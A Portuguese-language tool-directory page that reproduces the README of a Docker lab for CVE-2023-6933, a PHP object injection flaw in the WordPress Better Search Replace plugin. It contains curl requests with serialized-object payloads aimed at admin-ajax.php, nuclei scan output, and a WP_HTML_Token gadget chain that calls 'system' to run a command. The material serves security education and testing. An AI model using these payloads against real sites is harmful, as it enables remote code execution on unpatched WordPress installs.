Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vulnerable-bsr-lab-CVE-2023-6933 — Laboratório prático para CVE-2023-6933, uma vulnerabilidade de injeção de objeto PHP no plugin Better Search Replace do WordPress, com implantação Docker, modelo nuclei e scripts de exploração para pesquisa e educação em segurança. | Kitploit
Ferramentas/GitHubGitHub/trex96/vulnerable-bsr-lab-cve-2023-6933
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubtrex96/vulnerable-bsr-lab-cve-2023-6933

vulnerable-bsr-lab-CVE-2023-6933

Laboratório prático para CVE-2023-6933, uma vulnerabilidade de injeção de objeto PHP no plugin Better Search Replace do WordPress, com implantação Docker, modelo nuclei e scripts de exploração para pesquisa e educação em segurança.

Ver Repositório
5há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório de Vulnerabilidade CVE-2023-6933

Visão Geral

Este ambiente de laboratório demonstra a CVE-2023-6933, uma vulnerabilidade crítica de Injeção de Objetos PHP no plugin Better Search Replace para WordPress, versões ≤ 1.4.4.

Detalhes da Vulnerabilidade

  • ID CVE: CVE-2023-6933
  • Pontuação CVSS: 9.8 (Crítica)
  • Plugin Afetado: Better Search Replace ≤ 1.4.4
  • Tipo de Vulnerabilidade: Injeção de Objetos PHP via entrada de usuário desserializada
  • Vetor de Ataque: Endpoint AJAX /wp-admin/admin-ajax.php com ação search_replace_db

Início Rápido

1. Implante o Laboratório

root@kitploit:~
# Clone o repositório
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933

# Implante usando a imagem Docker Hub (pull automático)
docker-compose up -d

O laboratório irá automaticamente:

  • Baixar a imagem vulnerável do WordPress do Docker Hub (trex999/vulnerable-bsr-lab:latest)
  • Configurar WordPress com MySQL e phpMyAdmin
  • Instalar e ativar o plugin Better Search Replace vulnerável (v1.4.4)
  • Concluir a instalação em ~60 segundos

2. Acesse o Ambiente

  • WordPress: http://localhost:8080
  • Painel Admin: http://localhost:8080/wp-admin (admin/admin123)
  • phpMyAdmin: http://localhost:8081 (root/rootpassword)

3. Teste a Vulnerabilidade

root@kitploit:~
# Execute o POC automatizado
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

# Teste manual via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'

Análise Técnica

A Vulnerabilidade

O plugin Better Search Replace contém uma vulnerabilidade de Injeção de Objetos PHP em seu manipulador AJAX. A vulnerabilidade ocorre quando:

  1. A entrada do usuário é passada para o parâmetro search_for via POST para /wp-admin/admin-ajax.php
  2. A ação é definida como search_replace_db
  3. A entrada contém objetos PHP serializados que são desserializados sem validação adequada
  4. Isso permite instanciação arbitrária de objetos e potencial execução de código

Métodos de Verificação do POC

Nosso modelo nuclei demonstra a vulnerabilidade por meio de múltiplos estágios de verificação:

  1. Detecção do Plugin: Confirma a presença da versão vulnerável do plugin
  2. Teste de Injeção de Objetos: Envia payloads serializados e analisa as respostas
  3. Verificação Comportamental: Confirma o processamento bem-sucedido da desserialização de objetos

Principais Recursos deste Laboratório

  • Sem Dependência de Erro: O POC demonstra a vulnerabilidade real através de análise comportamental, não de mensagens de erro
  • Teste Funcional: Usa objetos serializados seguros para verificar a desserialização sem danos ao sistema
  • Implantação Automatizada: Configuração completa do laboratório com zero configuração manual
  • Múltiplos Métodos de Teste: Tanto modelos nuclei automatizados quanto comandos curl manuais

Documentação

Referência Rápida

  • README.md: Este arquivo — início rápido e visão geral
  • CVE-2023-6933_POC_DOCUMENTATION.md: Documentação técnica completa com análise detalhada do PoC
  • POC_TEMPLATE_SUMMARY.md: Conformidade de requisitos e confirmação de entrega

Modelo PoC Profissional

O modelo nuclei (nuclei-templates/cve-2023-6933.yaml) é estruturado profissionalmente:

  • Código limpo, sem comentários excessivos
  • Documentação técnica abrangente em arquivos separados
  • Formato de modelo pronto para produção
  • Conformidade total com padrões de pesquisa em segurança

Resultados dos Testes

Execução Bem-sucedida do POC

root@kitploit:~
$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]

[INF] Scan completed in 67ms. 4 matches found.

O POC com sucesso:

  • ✅ Detecta a versão vulnerável do plugin
  • ✅ Confirma a capacidade de injeção de objetos através da análise de resposta
  • ✅ Demonstra vulnerabilidade funcional sem dependência de erros
  • ✅ Fornece verificação comportamental da desserialização bem-sucedida

Aviso de Segurança

⚠️ AVISO: Este ambiente contém software intencionalmente vulnerável. Use apenas em ambientes de teste isolados. Não implante em produção ou sistemas acessíveis pela Internet.

Limpeza

root@kitploit:~
docker-compose down -v

Referências

  • Detalhes da CVE-2023-6933
  • Plugin Better Search Replace
  • Documentação sobre Injeção de Objetos PHP

Criado para fins educacionais e de pesquisa em segurança

Ambiente Docker (Docker_LAB_SETUP/)

  • WordPress 6.4.0 com Better Search Replace 1.4.3 vulnerável
  • Servidor MySQL 8.0
  • phpMyAdmin para gerenciamento do banco de dados
  • Ambiente vulnerável pré-configurado

Scripts de Exploit

  • cve_2023_6933_exploit.php — Kit de ferramentas abrangente de exploração PHP
  • wp_html_token_poc.php — Demonstração de RCE para WordPress 6.4.0+
  • bsr_direct_exploit.php — Teste direto de vulnerabilidade

Ferramentas de Detecção

  • nuclei-templates/cve-2023-6933.yaml — Modelo nuclei avançado
  • manual-test.sh — Script de teste manual abrangente

🎯 Metodologia de Exploração Adequada

Este laboratório demonstra detecção baseada em sucesso seguindo as melhores práticas para pesquisa de vulnerabilidades:

1. Detecção Baseada em Sucesso

Em vez de depender de erros HTTP 500, nossas ferramentas detectam:

  • Processamento bem-sucedido do payload
  • Desserialização de objetos serializados
  • Padrões de resposta da aplicação
  • Evidências de exploração funcional

2. Cadeia RCE WP_HTML_Token

Utilizando a classe WP_HTML_Token do WordPress 6.4.0+ para RCE real:

root@kitploit:~
O:13:"WP_HTML_Token":4:{
    s:13:"bookmark_name";s:14:"touch /tmp/rce";
    s:9:"node_name";s:8:"testnode";
    s:21:"has_self_closing_flag";b:0;
    s:10:"on_destroy";s:6:"system";
}

3. Múltiplos Vetores de Ataque

  • Exploração do endpoint AJAX (admin-ajax.php)
  • Manipulação direta da interface do plugin
  • Injeção no banco de dados via operações de busca/substituição

🔬 Abordagem de Teste

Teste Manual

root@kitploit:~
# Testar presença básica do plugin
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"

# Testar vulnerabilidade com payload seguro
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"

Recursos do Modelo Nuclei

  • Teste multivetor: 5 requisições HTTP diferentes
  • Correspondentes baseados em sucesso: Procura por processamento funcional, não por erros
  • Extração abrangente: Detecção de versão, análise de resposta
  • Payloads seguros: Abordagem de teste não destrutiva

Recursos de Teste Manual

  • Detecção e validação de versão do plugin
  • Geração e teste de múltiplos payloads
  • Demonstração da RCE via WP_HTML_Token
  • Verificação abrangente da vulnerabilidade

📊 Pontos de Acesso do Laboratório

ServiçoURLCredenciais
WordPresshttp://localhost:8080admin/admin
phpMyAdminhttp://localhost:8081root/rootpassword

🛡️ Considerações de Segurança

Para Pesquisadores

  • Este é um ambiente deliberadamente vulnerável
  • Use apenas em redes isoladas/controladas
  • Não para ambientes de produção
  • Apenas para fins educacionais

Para Defensores

  • Atualize Better Search Replace para ≥ 1.4.5
  • Implemente regras de WAF para dados serializados
  • Monitore padrões de injeção de objetos
  • Auditorias regulares de segurança em plugins WordPress

📚 Valor Educacional

Este laboratório oferece experiência prática com:

  • Vulnerabilidades de Injeção de Objetos PHP
  • Análise de segurança de plugins WordPress
  • Ataques de serialização/desserialização
  • Exploração de cadeias de gadgets
  • Automação de detecção de vulnerabilidades
  • Metodologias de teste de segurança

Autor: Trex
Versão do Laboratório: 2.0 — Metodologia POC Aprimorada

Baixar ferramenta